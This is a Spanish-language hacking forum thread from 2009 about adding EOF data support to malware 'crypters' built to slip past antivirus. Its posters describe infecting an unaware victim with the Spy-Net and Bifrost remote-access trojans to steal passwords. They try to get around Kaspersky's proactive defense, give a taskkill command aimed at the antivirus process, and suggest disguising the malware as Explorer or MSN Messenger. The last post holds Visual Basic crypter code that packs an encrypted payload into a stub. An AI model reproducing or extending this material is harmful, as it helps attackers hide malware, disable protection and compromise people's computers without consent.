• Agregar EOF Data de opcion en nuestros crypters

 #92865  por foncubierta
 14 Jul 2009, 17:49
[email protected] escribió:Viendo que estas conectado aprovechar para decirte que estoy mirando las opciones para hir incorporandolas ,Pedirte si Me puedes ayudar con alguna Me me lo envias a mi MSN ,sino pues lo posteas si te parece bien.


Bypass WFP

Anti DeepFreeze

Bypass KAV Proactive Defense

Icono Final

Realign PE Header
Gracias a este tutorial y al videotutorial de mansagle conseguir agregar eof a mi crypter :D Gracias a los dos.Ahora estoy intentando saltarme el karsperky creo que si le pongo el modulo ese de "Bypass KAV Proactive Defense" me lo saltaria si puedes decirme como se lo agrego y el codigo te lo agradaceria muchisimo ya que no hay manera de infectar un remoto que tiene el kasrpersky internet security :s
 #92869  por foncubierta
 14 Jul 2009, 18:15
Te explico.. lo consegi infectar con spy-net(no me preguntes como lo consegi porke no tneog ni idea XDD) y lo fui a infectar con el bifros aisn l otneog ne los dos lados y aparte peudo sacar mas contraseñas.. Cree el server le pase mi crypter y leugo se lo subo al remoto y ejecuto.. y salta el karspersky ke se ha intentando ejecutar un archivo y pregunta que si permite la autorizaicon a inciiar el archivo o no.. y ahi me quedo siemrpe.. he intentnaod introducirle stealer tambein y lo mismo.. :s supongo que es el sistema de la defensa proactiva lo que salta no?

EDITO: te dejo una captura que saque el otro dia de la maquina.
 #92871  por LuOpP
 14 Jul 2009, 18:21
Impedir k salte eso de permitir k tal programa se ejecute supera mis conocimientos, pero no es gran problema tampoko, tienes dos opciones. una martarle el av kon el k tienes dentro o ponerle un nombre ingenioso (si no sabe mucho de informatica) del tipo Explorer, msnMessenger o algo asi, el tio no sospechara le da a k si y via
 #92874  por foncubierta
 14 Jul 2009, 18:32
entocnes eso no seria la defensa proactiva no?:s sinceramente es que nucna me interese por probar le karsperky Xd intente ponerle un proceso que se conociera como msn y todo eos.. el problema es que le usuario simplemente lo deja ai.. sin tocar nada Xd si no deja la ventana y listo Xd y he intentnado matar el karsperky con taskkill /F /IM avp.exe y no me termina el proceso.. me dice quen o se peude finalizar le proceso
 #108942  por MUSUL
 15 Sep 2009, 06:30
Pues a mi me rompe los server siempre con el EOF. Si le paso el server del PI tambien me dice que tiene EOF. Porque?
Código: [ Debe registrarse para ver este enlace ]
If Check1.Value = 1 Then
eof = ReadEOFData(Text1.Text)
End If

Open App.Path & "\stub.exe" For Binary As #1
sStub = Space(LOF(1))
Get #1, , sStub
Close #1

Open Text1.Text For Binary As #1
sFile = Space(LOF(1))
Get #1, , sFile
Close #1

With cf
    .Filter = "Archivos Ejectutables (*.EXE)|*.exe"
    .DefaultExt = "exe"
    .DialogTitle = "Selecciona el destino del archivo"
    .ShowSave
End With

Open cf.FileName For Binary As #1
Put #1, , sStub & SePaRaDoR & lol(sFile, Clave)
Close #1

If Check1.Value = 1 Then
Call WriteEOFData(cf.FileName, eof)